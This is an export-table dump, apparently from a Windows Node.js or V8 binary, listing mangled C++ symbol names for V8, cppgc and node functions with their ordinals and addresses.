                                                                                                                                                                                                        ?GetDeoptimizationEntry@InstructionSequence@compiler@internal@v8@@QEAAAEBVDeoptimizationEntry@234@H@Z71140x140ea9080
                                                                                                                                                                                                        ?GetDeoptimizationEntryCount@InstructionSequence@compiler@internal@v8@@QEBAHXZ71150x1404bbe40
                                                                                                                                                                                                        ?GetDeoptimizedCodeCount@Deoptimizer@internal@v8@@SAHPEAVIsolate@23@@Z71160x140a54c10
                                                                                                                                                                                                        ?GetDetailedStackTrace@Isolate@internal@v8@@QEAA?AV?$Handle@VFixedArray@internal@v8@@@23@V?$Handle@VJSObject@internal@v8@@@23@@Z71170x140a116b0
                                                                                                                                                                                                        ?GetDetails@Descriptor@internal@v8@@QEBA?AVPropertyDetails@23@XZ71180x140484280
                                                                                                                                                                                                        ?GetDetails@MapUpdater@internal@v8@@AEBA?AVPropertyDetails@23@VInternalIndex@23@@Z71190x140818770
                                                                                                                                                                                                        ?GetDispatchCounter@Interpreter@interpreter@internal@v8@@AEBA_KW4Bytecode@234@0@Z71200x1408f14d0
                                                                                                                                                                                                        ?GetDispatchCountersObject@Interpreter@interpreter@internal@v8@@QEAA?AV?$Local@VObject@v8@@@4@XZ71210x1408f1510
                                                                                                                                                                                                        ?GetDisplayName@Function@v8@@QEBA?AV?$Local@VValue@v8@@@2@XZ71220x140b14aa0
                                                                                                                                                                                                        ?GetEffectInput@NodeProperties@compiler@internal@v8@@SAPEAVNode@234@PEAV5234@H@Z71230x1404bbe60
                                                                                                                                                                                                        ?GetEffectLevel@InstructionSelector@compiler@internal@v8@@QEBAHPEAVNode@234@@Z71240x140ed5e90
                                                                                                                                                                                                        ?GetEffectLevel@InstructionSelector@compiler@internal@v8@@QEBAHPEAVNode@234@PEAVFlagsContinuation@234@@Z71250x140ed5eb0
                                                                                                                                                                                                        ?GetEhFrame@EhFrameWriter@internal@v8@@QEAAXPEAVCodeDesc@23@@Z71260x140a41460
                                                                                                                                                                                                        ?GetElapsedTimeInMs@IncrementalMarkingSchedule@internal@cppgc@@AEAANVTimeTicks@base@v8@@@Z71270x140461a30
                                                                                                                                                                                                        ?GetEmbeddedCodeRange@Isolate@v8@@QEAAXPEAPEBXPEA_K@Z71280x140b14bf0
                                                                                                                                                                                                        ?GetEmbeddedObject@AssemblerBase@internal@v8@@IEBA?AV?$Handle@VHeapObject@internal@v8@@@23@_K@Z71290x140ab43e0
                                                                                                                                                                                                        ?GetEmbedder@Version@internal@v8@@SAPEBDXZ71300x140528fa0
                                                                                                                                                                                                        ?GetEmbedderData@Context@v8@@QEAA?AV?$Local@VValue@v8@@@2@H@Z71310x1400792e0
                                                                                                                                                                                                        ?GetEmbedderHeapTracer@Isolate@v8@@QEAAPEAVEmbedderHeapTracer@2@XZ71320x140b14c40
                                                                                                                                                                                                        ?GetEmpty@OrderedHashMap@internal@v8@@SA?AVHeapObject@23@VReadOnlyRoots@23@@Z71330x1407e53e0
                                                                                                                                                                                                        ?GetEmpty@OrderedHashSet@internal@v8@@SA?AVHeapObject@23@VReadOnlyRoots@23@@Z71340x1407e53f0
                                                                                                                                                                                                        ?GetEmptyStateValues@StateValuesCache@compiler@internal@v8@@AEAAPEAVNode@234@XZ71350x140f57490
                                                                                                                                                                                                        ?GetEncodedSize@WasmExceptionPackage@internal@v8@@SAIPEBUWasmTag@wasm@23@@Z71360x1405303f0
                                                                                                                                                                                                        ?GetEncoding@TransitionsAccessor@internal@v8@@CA?AW4Encoding@123@PEAVIsolate@23@VMaybeObject@23@@Z71370x140484290
                                                                                                                                                                                                        ?GetEndColumn@Message@v8@@QEBA?AV?$Maybe@H@2@V?$Local@VContext@v8@@@2@@Z71380x140b14c50
                                                                                                                                                                                                        ?GetEndColumn@Message@v8@@QEBAHXZ71390x140b14c70
                                                                                                                                                                                                        ?GetEndPosition@Message@v8@@QEBAHXZ71400x140b14e00
                                                                                                                                                                                                        ?GetEndTime@CpuProfile@v8@@QEBA_JXZ71410x140b14f70
                                                                                                                                                                                                        ?GetEnteredOrMicrotaskContext@Isolate@v8@@QEAA?AV?$Local@VContext@v8@@@2@XZ71420x140b14f90
                                                                                                                                                                                                        ?GetEntry@StringsStorage@internal@v8@@AEAAPEAU?$TemplateHashMapEntry@PEAXPEAX@base@3@PEBDH@Z71430x1407466c0
                                                                                                                                                                                                        ?GetEntry@V8HeapExplorer@internal@v8@@AEAAPEAVHeapEntry@23@VObject@23@@Z71440x140757aa0
                                                                                                                                                                                                        ?GetEnvironmentIsolateData@node@@YAPEAVIsolateData@1@PEAVEnvironment@1@@Z71450x14028ca80
                                                                                                                                                                                                        ?GetException@Module@v8@@QEBA?AV?$Local@VValue@v8@@@2@XZ71460x140b15030
                                                                                                                                                                                                        ?GetExceptionTag@WasmExceptionPackage@internal@v8@@SA?AV?$Handle@VObject@internal@v8@@@23@PEAVIsolate@23@V?$Handle@VWasmExceptionPackage@internal@v8@@@23@@Z71470x1405304b0
                                                                                                                                                                                                        ?GetExceptionType@WasmModuleBuilder@wasm@internal@v8@@QEAAPEAV?$Signature@VValueType@wasm@internal@v8@@@34@H@Z71480x1405405c0
                                                                                                                                                                                                        ?GetExceptionValues@WasmExceptionPackage@internal@v8@@SA?AV?$Handle@VObject@internal@v8@@@23@PEAVIsolate@23@V?$Handle@VWasmExceptionPackage@internal@v8@@@23@@Z71490x140530540
                                                                                                                                                                                                        ?GetExistingThreadLocal@Thread@base@v8@@SAPEAXH@Z71500x140e5ed30
                                                                                                                                                                                                        ?GetExportName@DebugInfo@wasm@internal@v8@@QEAA?AVWireBytesRef@234@W4ImportExportKindCode@234@I@Z71510x140560d30
                                                                                                                                                                                                        ?GetExternalOneByteStringResource@String@v8@@QEBAPEBVExternalOneByteStringResource@12@XZ71520x140b15140
                                                                                                                                                                                                        ?GetExternalStringResource@String@v8@@QEBAPEAVExternalStringResource@12@XZ71530x140079120
                                                                                                                                                                                                        ?GetExternalStringResourceBase@String@v8@@QEBAPEAVExternalStringResourceBase@12@PEAW4Encoding@12@@Z71540x140079140
                                                                                                                                                                                                        ?GetExternalStringResourceBaseSlow@String@v8@@AEBAPEAVExternalStringResourceBase@12@PEAW4Encoding@12@@Z71550x140b15190
                                                                                                                                                                                                        ?GetExternalStringResourceSlow@String@v8@@AEBAPEAVExternalStringResource@12@XZ71560x140b15200
                                                                                                                                                                                                        ?GetExternallyCompiledFilename@Isolate@internal@v8@@QEBAPEBDH@Z71570x140a11780
                                                                                                                                                                                                        ?GetExternallyCompiledFilenameCount@Isolate@internal@v8@@QEBAHXZ71580x140a117a0
                                                                                                                                                                                                        ?GetExtrasBindingObject@Context@v8@@QEAA?AV?$Local@VObject@v8@@@2@XZ71590x140b15240
                                                                                                                                                                                                        ?GetFeedback@FeedbackNexus@internal@v8@@QEBA?AVMaybeObject@23@XZ71600x140484310
                                                                                                                                                                                                        ?GetFeedback@JSHeapBroker@compiler@internal@v8@@AEBAAEBVProcessedFeedback@234@AEBUFeedbackSource@234@@Z71610x140f2e920
                                                                                                                                                                                                        ?GetFeedback@NexusConfig@internal@v8@@QEBA?AVMaybeObject@23@VFeedbackVector@23@VFeedbackSlot@23@@Z71620x140484340
                                                                                                                                                                                                        ?GetFeedbackExtra@FeedbackNexus@internal@v8@@QEBA?AVMaybeObject@23@XZ71630x140484360
                                                                                                                                                                                                        ?GetFeedbackForArrayOrObjectLiteral@JSHeapBroker@compiler@internal@v8@@QEAAAEBVProcessedFeedback@234@AEBUFeedbackSource@234@@Z71640x140f2e9d0
                                                                                                                                                                                                        ?GetFeedbackForBinaryOperation@JSHeapBroker@compiler@internal@v8@@QEAA?AW4BinaryOperationHint@34@AEBUFeedbackSource@234@@Z71650x140f2ea30
                                                                                                                                                                                                        ?GetFeedbackForCall@JSHeapBroker@compiler@internal@v8@@QEAAAEBVProcessedFeedback@234@AEBUFeedbackSource@234@@Z71660x140f2eac0
                                                                                                                                                                                                        ?GetFeedbackForCompareOperation@JSHeapBroker@compiler@internal@v8@@QEAA?AW4CompareOperationHint@34@AEBUFeedbackSource@234@@Z71670x140f2eb20
                                                                                                                                                                                                        ?GetFeedbackForForIn@JSHeapBroker@compiler@internal@v8@@QEAA?AW4ForInHint@34@AEBUFeedbackSource@234@@Z71680x140f2ebb0
                                                                                                                                                                                                        ?GetFeedbackForGlobalAccess@JSHeapBroker@compiler@internal@v8@@QEAAAEBVProcessedFeedback@234@AEBUFeedbackSource@234@@Z71690x140f2ec40
                                                                                                                                                                                                        ?GetFeedbackForInstanceOf@JSHeapBroker@compiler@internal@v8@@QEAAAEBVProcessedFeedback@234@AEBUFeedbackSource@234@@Z71700x140f2eca0
                                                                                                                                                                                                        ?GetFeedbackForPropertyAccess@JSHeapBroker@compiler@internal@v8@@QEAAAEBVProcessedFeedback@234@AEBUFeedbackSource@234@W4AccessMode@234@V?$Optional@VNameRef@compiler@internal@v8@@@base@4@@Z71710x140f2ed00
                                                                                                                                                                                                        ?GetFeedbackForRegExpLiteral@JSHeapBroker@compiler@internal@v8@@QEAAAEBVProcessedFeedback@234@AEBUFeedbackSource@234@@Z71720x140f2ed80
                                                                                                                                                                                                        ?GetFeedbackForTemplateObject@JSHeapBroker@compiler@internal@v8@@QEAAAEBVProcessedFeedback@234@AEBUFeedbackSource@234@@Z71730x140f2ede0
                                                                                                                                                                                                        ?GetFeedbackPair@FeedbackNexus@internal@v8@@QEBA?AU?$pair@VMaybeObject@internal@v8@@V123@@std@@XZ71740x140484390
                                                                                                                                                                                                        ?GetFeedbackPair@NexusConfig@internal@v8@@QEBA?AU?$pair@VMaybeObject@internal@v8@@V123@@std@@VFeedbackVector@23@VFeedbackSlot@23@@Z71750x14087b2a0
                                                                                                                                                                                                        ?GetFeedbackSlotKind@JSHeapBroker@compiler@internal@v8@@QEBA?AW4FeedbackSlotKind@34@AEBUFeedbackSource@234@@Z71760x140f2ee40
                                                                                                                                                                                                        ?GetFieldDescriptorIndex@LookupIterator@internal@v8@@QEBAHXZ71770x14081c570
                                                                                                                                                                                                        ?GetFieldIndex@LookupIterator@internal@v8@@QEBA?AVFieldIndex@23@XZ71780x14081c5c0
                                                                                                                                                                                                        ?GetFieldIndexFor@MapRef@compiler@internal@v8@@QEBA?AVFieldIndex@34@VInternalIndex@34@@Z71790x140e85e40
                                                                                                                                                                                                        ?GetFieldName@DebugInfo@wasm@internal@v8@@QEAA?AVWireBytesRef@234@HH@Z71800x1405610b0
                                                                                                                                                                                                        ?GetFieldType@MapRef@compiler@internal@v8@@QEBA?AVObjectRef@234@VInternalIndex@34@@Z71810x140e85f00
                                                                                                                                                                                                        ?GetFieldType@MapUpdater@internal@v8@@AEBA?AVFieldType@23@VInternalIndex@23@@Z71820x140818800
                                                                                                                                                                                                        ?GetFilename@WasmModuleSourceMap@wasm@internal@v8@@QEBA?AV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@_K@Z71830x14053c3f0
                                                                                                                                                                                                        ?GetFillToAlign@Heap@internal@v8@@SAH_KW4AllocationAlignment@23@@Z71840x1409b7600
                                                                                                                                                                                                        ?GetFirstMap@FeedbackNexus@internal@v8@@QEBA?AVMap@23@XZ71850x14087b340
                                                                                                                                                                                                        ?GetFixedSlotCount@Frame@compiler@internal@v8@@QEBAHXZ71860x140078ad0
                                                                                                                                                                                                        ?GetFlag@OptimizedCompilationInfo@internal@v8@@AEBA_NW4Flag@123@@Z71870x1404fef50
                                                                                                                                                                                                        ?GetFlagOperand@BytecodeArrayIterator@interpreter@internal@v8@@QEBAIH@Z71880x1409137d0
                                                                                                                                                                                                        ?GetFlags@RegExp@v8@@QEBA?AW4Flags@12@XZ71890x140b152c0
                                                                                                                                                                                                        ?GetFlatContent@String@internal@v8@@QEAA?AVFlatContent@123@AEBV?$CombinationAssertScope@V?$PerThreadAssertScopeDebugOnly@$0A@$0A@@internal@v8@@V?$PerThreadAssertScopeDebugOnly@$00$0A@@23@@23@@Z71900x1407c4160
                                                                                                                                                                                                        ?GetFloat32RepresentationFor@RepresentationChanger@compiler@internal@v8@@AEAAPEAVNode@234@PEAV5234@W4MachineRepresentation@34@VType@234@VTruncation@234@@Z71910x1410a56d0
                                                                                                                                                                                                        ?GetFloat64RepresentationFor@RepresentationChanger@compiler@internal@v8@@AEAAPEAVNode@234@PEAV5234@W4MachineRepresentation@34@VType@234@0VUseInfo@234@@Z71920x1410a59e0
                                                                                                                                                                                                        ?GetForInFeedback@FeedbackNexus@internal@v8@@QEBA?AW4ForInHint@23@XZ71930x14087b380
                                                                                                                                                                                                        ?GetForThread@ThreadTicks@base@v8@@SA?AV123@AEBQEAX@Z71940x140e62570
                                                                                                                                                                                                        ?GetForegroundTaskRunner@DefaultPlatform@cppgc@@UEAA?AV?$shared_ptr@VTaskRunner@v8@@@std@@XZ71950x140467640
                                                                                                                                                                                                        ?GetForegroundTaskRunner@Platform@cppgc@@UEAA?AV?$shared_ptr@VTaskRunner@v8@@@std@@XZ71960x14044fdb0
                                                                                                                                                                                                        ?GetFormatted@StringsStorage@internal@v8@@QEAAPEBDPEBDZZ71970x140746790
                                                                                                                                                                                                        ?GetFrame@StackTrace@v8@@QEBA?AV?$Local@VStackFrame@v8@@@2@PEAVIsolate@2@I@Z71980x140b152d0
                                                                                                                                                                                                        ?GetFrameCount@StackTrace@v8@@QEBAHXZ71990x140b15350
                                                                                                                                                                                                        ?GetFrameStateDescriptor@InstructionSelector@compiler@internal@v8@@AEAAPEAVFrameStateDescriptor@234@VFrameState@234@@Z72000x140ed5f00
                                                                                                                                                                                                        ?GetFrameStateInput@NodeProperties@compiler@internal@v8@@SAPEAVNode@234@PEAV5234@@Z72010x1404bbf30
                                                                                                                                                                                                        ?GetFrameStateInputCount@OperatorProperties@compiler@internal@v8@@SAHPEBVOperator@234@@Z72020x1404bbfb0
                                                                                                                                                                                                        ?GetFromNode@HeapGraphEdge@v8@@QEBAPEBVHeapGraphNode@2@XZ72030x140b15360
                                                                                                                                                                                                        ?GetFunction@FunctionTemplate@v8@@QEAA?AV?$MaybeLocal@VFunction@v8@@@2@V?$Local@VContext@v8@@@2@@Z72040x140b15390
                                                                                                                                                                                                        ?GetFunctionAtAddress@DebugInfo@wasm@internal@v8@@QEAAAEBUWasmFunction@234@_K@Z72050x140561270
                                                                                                                                                                                                        ?GetFunctionBytes@ModuleWireBytes@wasm@internal@v8@@QEBA?AV?$Vector@$$CBE@base@4@PEBUWasmFunction@234@@Z72060x140484550
                                                                                                                                                                                                        ?GetFunctionData@ScriptData@Coverage@debug@v8@@QEBA?AVFunctionData@234@_K@Z72070x140a6f730
                                                                                                                                                                                                        ?GetFunctionDebuggingId@Debug@internal@v8@@QEAAHV?$Handle@VJSFunction@internal@v8@@@23@@Z72080x140a60a20
                                                                                                                                                                                                        ?GetFunctionFromEval@Compiler@internal@v8@@SA?AV?$MaybeHandle@VJSFunction@internal@v8@@@23@V?$Handle@VString@internal@v8@@@23@V?$Handle@VSharedFunctionInfo@internal@v8@@@23@V?$Handle@VContext@internal@v8@@@23@W4LanguageMode@23@W4ParseRestriction@23@HHH@Z72090x140aaab80
                                                                                                                                                                                                        ?GetFunctionFromString@Compiler@internal@v8@@SA?AV?$MaybeHandle@VJSFunction@internal@v8@@@23@V?$Handle@VContext@internal@v8@@@23@V?$Handle@VObject@internal@v8@@@23@W4ParseRestriction@23@H_N@Z72100x140aab380
                                                                                                                                                                                                        ?GetFunctionFromValidatedString@Compiler@internal@v8@@SA?AV?$MaybeHandle@VJSFunction@internal@v8@@@23@V?$Handle@VContext@internal@v8@@@23@V?$MaybeHandle@VString@internal@v8@@@23@W4ParseRestriction@23@H@Z72110x140aab400
                                                                                                                                                                                                        ?GetFunctionIndexFromJumpTableSlot@NativeModule@wasm@internal@v8@@QEBAI_K@Z72120x14056bab0
                                                                                                                                                                                                        ?GetFunctionName@CodeEvent@v8@@QEAA?AV?$Local@VString@v8@@@2@XZ72130x140498320
                                                                                                                                                                                                        ?GetFunctionName@CpuProfileNode@v8@@QEBA?AV?$Local@VString@v8@@@2@XZ72140x140b15650
                                                                                                                                                                                                        ?GetFunctionName@ProfilerListener@internal@v8@@AEAAPEBDVSharedFunctionInfo@23@@Z72150x14074b810
                                                                                                                                                                                                        ?GetFunctionName@StackFrame@v8@@QEBA?AV?$Local@VString@v8@@@2@XZ72160x140b156b0
                                                                                                                                                                                                        ?GetFunctionNameStr@CpuProfileNode@v8@@QEBAPEBDXZ72170x140b15710
                                                                                                                                                                                                        ?GetFunctionOffsets@AsmJsOffsetInformation@wasm@internal@v8@@QEAA?AU?$pair@HH@std@@H@Z72180x140539db0
                                                                                                                                                                                                        ?GetGlobalBufferAndIndex@WasmInstanceObject@internal@v8@@SA?AU?$pair@V?$Handle@VFixedArray@internal@v8@@@internal@v8@@I@std@@V?$Handle@VWasmInstanceObject@internal@v8@@@23@AEBUWasmGlobal@wasm@23@@Z72190x140530ba0
                                                                                                                                                                                                        ?GetGlobalStorage@WasmInstanceObject@internal@v8@@SAPEAEV?$Handle@VWasmInstanceObject@internal@v8@@@23@AEBUWasmGlobal@wasm@23@@Z72200x140530cc0
                                                                                                                                                                                                        ?GetGlobalValue@WasmInstanceObject@internal@v8@@SA?AVWasmValue@wasm@23@V?$Handle@VWasmInstanceObject@internal@v8@@@23@AEBUWasmGlobal@523@@Z72210x140530cf0
                                                                                                                                                                                                        ?GetHandle@PersistentHandles@internal@v8@@AEAAPEA_K_K@Z72220x1409f3ed0
                                                                                                                                                                                                        ?GetHandler@Proxy@v8@@QEAA?AV?$Local@VValue@v8@@@2@XZ72230x140a6f020
                                                                                                                                                                                                        ?GetHandlerTableOffset@CodeGenerator@compiler@internal@v8@@QEBA_KXZ72240x1404fef60
                                                                                                                                                                                                        ?GetHasInstance@Symbol@v8@@SA?AV?$Local@VSymbol@v8@@@2@PEAVIsolate@2@@Z72250x140b15720
                                                                                                                                                                                                        ?GetHash@OrderedHashMap@internal@v8@@SA_KPEAVIsolate@23@_K@Z72260x1407e5400
                                                                                                                                                                                                        ?GetHashCore@StringHasher@internal@v8@@SAII@Z72270x140484570
                                                                                                                                                                                                        ?GetHeapCodeAndMetadataStatistics@Isolate@v8@@QEAA_NPEAVHeapCodeStatistics@2@@Z72280x140b15730
                                                                                                                                                                                                        ?GetHeapHandle@CppHeap@v8@@QEAAAEAVHeapHandle@cppgc@@XZ72290x140462f30
                                                                                                                                                                                                        ?GetHeapHandle@Heap@cppgc@@QEAAAEAVHeapHandle@2@XZ72300x140462f30
                                                                                                                                                                                                        ?GetHeapIfMarking@WriteBarrier@internal@v8@@CA?AV?$Optional@PEAVHeap@internal@v8@@@base@3@VHeapObject@23@@Z72310x1404779b0
                                                                                                                                                                                                        ?GetHeapObjectStatisticsAtLastGC@Isolate@v8@@QEAA_NPEAVHeapObjectStatistics@2@_K@Z72320x140b15790
                                                                                                                                                                                                        ?GetHeapProfiler@Isolate@v8@@QEAAPEAVHeapProfiler@2@XZ72330x14048e4f0
                                                                                                                                                                                                        ?GetHeapSnapshot@HeapProfiler@v8@@QEAAPEBVHeapSnapshot@2@H@Z72340x140b15840
                                                                                                                                                                                                        ?GetHeapSpaceStatistics@Isolate@v8@@QEAA_NPEAVHeapSpaceStatistics@2@_K@Z72350x140b15850
                                                                                                                                                                                                        ?GetHeapStatistics@Isolate@v8@@QEAAXPEAVHeapStatistics@2@@Z72360x140b15960
                                                                                                                                                                                                        ?GetHeapStats@HeapProfiler@v8@@QEAAIPEAVOutputStream@2@PEA_J@Z72370x140b15ab0
                                                                                                                                                                                                        ?GetHintFor@BranchHintMap@wasm@internal@v8@@QEBA?AW4WasmBranchHint@234@I@Z72380x1404845a0
                                                                                                                                                                                                        ?GetHitBreakPoints@Debug@internal@v8@@QEAA?AV?$MaybeHandle@VFixedArray@internal@v8@@@23@V?$Handle@VDebugInfo@internal@v8@@@23@H@Z72390x140a60b30
                                                                                                                                                                                                        ?GetHitCount@CpuProfileNode@v8@@QEBAIXZ72400x1402c3750
                                                                                                                                                                                                        ?GetHitLineCount@CpuProfileNode@v8@@QEBAIXZ72410x14035b830
                                                                                                                                                                                                        ?GetHitLineCount@ProfileNode@internal@v8@@QEBAIXZ72420x14035b830
                                                                                                                                                                                                        ?GetHomeObjectScope@Scope@internal@v8@@QEAAPEAV123@XZ72430x140af55e0
                                                                                                                                                                                                        ?GetHostDefinedOptions@ScriptOrModule@v8@@QEAA?AV?$Local@VPrimitiveArray@v8@@@2@XZ72440x140b15ac0
                                                                                                                                                                                                        ?GetI32WasmCallDescriptor@compiler@internal@v8@@YAPEAVCallDescriptor@123@PEAVZone@23@PEBV4123@@Z72450x140efba40
                                                                                                                                                                                                        ?GetI32WasmCallDescriptorForSimd@compiler@internal@v8@@YAPEAVCallDescriptor@123@PEAVZone@23@PEAV4123@@Z72460x140efba70
                                                                                                                                                                                                        ?GetId@HeapGraphNode@v8@@QEBAIXZ72470x1403b2bd0
                                                                                                                                                                                                        ?GetId@UnboundScript@v8@@QEAAHXZ72480x140b15b60
                                                                                                                                                                                                        ?GetIdAt@SourceIdAssigner@compiler@internal@v8@@QEBAH_K@Z72490x140efbaa0
                                                                                                                                                                                                        ?GetIdFor@SourceIdAssigner@compiler@internal@v8@@QEAAHV?$Handle@VSharedFunctionInfo@internal@v8@@@34@@Z72500x140f62ac0
                                                                                                                                                                                                        ?GetIdentifier@Parser@internal@v8@@AEBAPEBVAstRawString@23@XZ72510x140775110
                                                                                                                                                                                                        ?GetIdentifierString@AsmJsScanner@internal@v8@@QEBAAEBV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@XZ72520x14019ac90
                                                                                                                                                                                                        ?GetIdentityHash@JSReceiver@internal@v8@@QEAA?AVObject@23@XZ72530x140837660
                                                                                                                                                                                                        ?GetIdentityHash@Module@v8@@QEBAHXZ72540x140485540
                                                                                                                                                                                                        ?GetIdentityHash@Name@v8@@QEAAHXZ72550x140b15c70
                                                                                                                                                                                                        ?GetIdentityHash@Object@v8@@QEAAHXZ72560x140b15ca0
                                                                                                                                                                                                        ?GetImmediate@InstructionSequence@compiler@internal@v8@@QEBA?AVConstant@234@PEBVImmediateOperand@234@@Z72570x1404bbfd0
                                                                                                                                                                                                        ?GetImmediateOperand@BytecodeArrayIterator@interpreter@internal@v8@@QEBAHH@Z72580x140913810
                                                                                                                                                                                                        ?GetImplicitRegisterUse@Bytecodes@interpreter@internal@v8@@SA?AW4ImplicitRegisterUse@234@W4Bytecode@234@@Z72590x140484640
                                                                                                                                                                                                        ?GetImportAssertions@ModuleRequest@v8@@QEBA?AV?$Local@VFixedArray@v8@@@2@XZ72600x140a72990
                                                                                                                                                                                                        ?GetImportAssertionsFromArgument@Isolate@internal@v8@@AEAA?AV?$MaybeHandle@VFixedArray@internal@v8@@@23@V?$MaybeHandle@VObject@internal@v8@@@23@@Z72610x140a117c0
                                                                                                                                                                                                        ?GetImportMeta@JSOperatorBuilder@compiler@internal@v8@@QEAAPEBVOperator@234@XZ72620x140f3c960
                                                                                                                                                                                                        ?GetImportMeta@SourceTextModule@internal@v8@@SA?AV?$MaybeHandle@VJSObject@internal@v8@@@23@PEAVIsolate@23@V?$Handle@VSourceTextModule@internal@v8@@@23@@Z72630x1407d2ed0
                                                                                                                                                                                                        ?GetImportName@DebugInfo@wasm@internal@v8@@QEAA?AU?$pair@VWireBytesRef@wasm@internal@v8@@V1234@@std@@W4ImportExportKindCode@234@I@Z72640x1405612d0
                                                                                                                                                                                                        ?GetInLiveness@BytecodeLivenessMap@compiler@internal@v8@@QEAAPEAVBytecodeLivenessState@234@H@Z72650x140f95b00
                                                                                                                                                                                                        ?GetInLiveness@BytecodeLivenessMap@compiler@internal@v8@@QEBAPEBVBytecodeLivenessState@234@H@Z72660x140f95b00
                                                                                                                                                                                                        ?GetInLivenessFor@BytecodeAnalysis@compiler@internal@v8@@QEBAPEBVBytecodeLivenessState@234@H@Z72670x141097d60
                                                                                                                                                                                                        ?GetInObjectProperties@MapRef@compiler@internal@v8@@QEBAHXZ72680x140e867d0
                                                                                                                                                                                                        ?GetInObjectPropertiesStartInWords@MapRef@compiler@internal@v8@@QEBAHXZ72690x140e86830
                                                                                                                                                                                                        ?GetInObjectPropertyOffset@MapRef@compiler@internal@v8@@QEBAHH@Z72700x140e868a0
                                                                                                                                                                                                        ?GetIncomingDescriptor@Linkage@compiler@internal@v8@@QEBAPEAVCallDescriptor@234@XZ72710x140078aa0
                                                                                                                                                                                                        ?GetIncumbentContext@Isolate@internal@v8@@QEAA?AV?$Handle@VContext@internal@v8@@@23@XZ72720x140a11cb0
                                                                                                                                                                                                        ?GetIncumbentContext@Isolate@v8@@QEAA?AV?$Local@VContext@v8@@@2@XZ72730x140b15d30
                                                                                                                                                                                                        ?GetIndex@NormalPageMemoryRegion@internal@cppgc@@AEBA_KPEBE@Z72740x140450fc0
                                                                                                                                                                                                        ?GetIndexNodes@Int64Lowering@compiler@internal@v8@@AEAAXPEAVNode@234@PEAPEAV5234@1@Z72750x140f687c0
                                                                                                                                                                                                        ?GetIndexOperand@BytecodeArrayIterator@interpreter@internal@v8@@QEBAIH@Z72760x140913850
                                                                                                                                                                                                        ?GetInferredName@Function@v8@@QEBA?AV?$Local@VValue@v8@@@2@XZ72770x140b15d60
                                                                                                                                                                                                        ?GetInitialSpaceIndexForSize@ObjectAllocator@internal@cppgc@@CA?AW4RegularSpaceType@RawHeap@23@_K@Z72780x14044fdc0
                                                                                                                                                                                                        ?GetInlineability@SharedFunctionInfoRef@compiler@internal@v8@@QEBA?AW4Inlineability@SharedFunctionInfo@34@XZ72790x140e86af0
                                                                                                                                                                                                        ?GetInliningId@SourcePositionTable@internal@v8@@QEBAHH@Z72800x14074e610
                                                                                                                                                                                                        ?GetInputLocation@CallDescriptor@compiler@internal@v8@@QEBA?AVLinkageLocation@234@_K@Z72810x1404bc080
                                                                                                                                                                                                        ?GetInputPtr@Node@compiler@internal@v8@@AEAAPEAPEAV1234@H@Z72820x1404bc0b0
                                                                                                                                                                                                        ?GetInputPtrConst@Node@compiler@internal@v8@@AEBAPEBQEAV1234@H@Z72830x1404bc0b0
                                                                                                                                                                                                        ?GetInputRegister@BytecodeRegisterOptimizer@interpreter@internal@v8@@QEAA?AVRegister@234@V5234@@Z72840x1408f8180
                                                                                                                                                                                                        ?GetInputRegisterList@BytecodeRegisterOptimizer@interpreter@internal@v8@@QEAA?AVRegisterList@234@V5234@@Z72850x1408f8210
                                                                                                                                                                                                        ?GetInputRegisterListOperand@BytecodeArrayBuilder@interpreter@internal@v8@@QEAAIVRegisterList@234@@Z72860x14091e3c0
                                                                                                                                                                                                        ?GetInputRegisterOperand@BytecodeArrayBuilder@interpreter@internal@v8@@QEAAIVRegister@234@@Z72870x14091e400
                                                                                                                                                                                                        ?GetInputType@CallDescriptor@compiler@internal@v8@@QEBA?AVMachineType@34@_K@Z72880x1404bc0e0
                                                                                                                                                                                                        ?GetInspectorParentHandle@node@@YA?AV?$unique_ptr@UInspectorParentHandle@node@@U?$default_delete@UInspectorParentHandle@node@@@std@@@std@@PEAVEnvironment@1@UThreadId@1@PEBD@Z72890x14028ca90
                                                                                                                                                                                                        ?GetInstructionBlock@InstructionSequence@compiler@internal@v8@@QEBAPEAVInstructionBlock@234@H@Z72900x140ea9110
                                                                                                                                                                                                        ?GetInstructionFlags@InstructionScheduler@compiler@internal@v8@@AEBAHPEBVInstruction@234@@Z72910x140f53b50
                                                                                                                                                                                                        ?GetInterceptor@LookupIterator@internal@v8@@QEBA?AV?$Handle@VInterceptorInfo@internal@v8@@@23@XZ72920x140484650
                                                                                                                                                                                                        ?GetInterceptorForFailedAccessCheck@LookupIterator@internal@v8@@QEBA?AV?$Handle@VInterceptorInfo@internal@v8@@@23@XZ72930x14081c5f0
                                                                                                                                                                                                        ?GetInternalField@Object@v8@@QEAA?AV?$Local@VValue@v8@@@2@H@Z72940x140079050
                                                                                                                                                                                                        ?GetInternalPointer@StatsCounterThreadSafe@internal@v8@@QEAAPEAHXZ72950x140078d20
                                                                                                                                                                                                        ?GetInternalProperties@Runtime@internal@v8@@SA?AV?$MaybeHandle@VJSArray@internal@v8@@@23@PEAVIsolate@23@V?$Handle@VObject@internal@v8@@@23@@Z72960x14070b7e0
                                                                                                                                                                                                        ?GetIntrinsicIdOperand@BytecodeArrayIterator@interpreter@internal@v8@@QEBA?AW4FunctionId@Runtime@34@H@Z72970x1409138a0
                                                                                                                                                                                                        ?GetIsConcatSpreadable@Symbol@v8@@SA?AV?$Local@VSymbol@v8@@@2@PEAVIsolate@2@@Z72980x140b15ec0
                                                                                                                                                                                                        ?GetIsolate@Context@v8@@QEAAPEAVIsolate@2@XZ72990x14089f0a0
                                                                                                                                                                                                        ?GetIsolate@FeedbackNexus@internal@v8@@QEBAPEAVIsolate@23@XZ73000x140484810
                                                                                                                                                                                                        ?GetIsolate@HandleScope@v8@@QEBAPEAVIsolate@2@XZ73010x140078aa0
                                                                                                                                                                                                        ?GetIsolate@Message@v8@@QEBAPEAVIsolate@2@XZ73020x14089f0a0
                                                                                                                                                                                                        ?GetIsolate@Object@v8@@QEAAPEAVIsolate@2@XZ73030x14089f0a0
                                                                                                                                                                                                        ?GetIsolate@Script@debug@v8@@QEBAPEAVIsolate@3@XZ73040x14089f0a0
                                                                                                                                                                                                        ?GetIsolate@SnapshotCreator@v8@@QEAAPEAVIsolate@2@XZ73050x1403beec0
                                                                                                                                                                                                        ?GetIterator@BytecodeArrayBuilder@interpreter@internal@v8@@QEAAAEAV1234@VRegister@234@HH@Z73060x14091e430
                                                                                                                                                                                                        ?GetIterator@JSOperatorBuilder@compiler@internal@v8@@QEAAPEBVOperator@234@AEBUFeedbackSource@234@0@Z73070x140f3c9f0
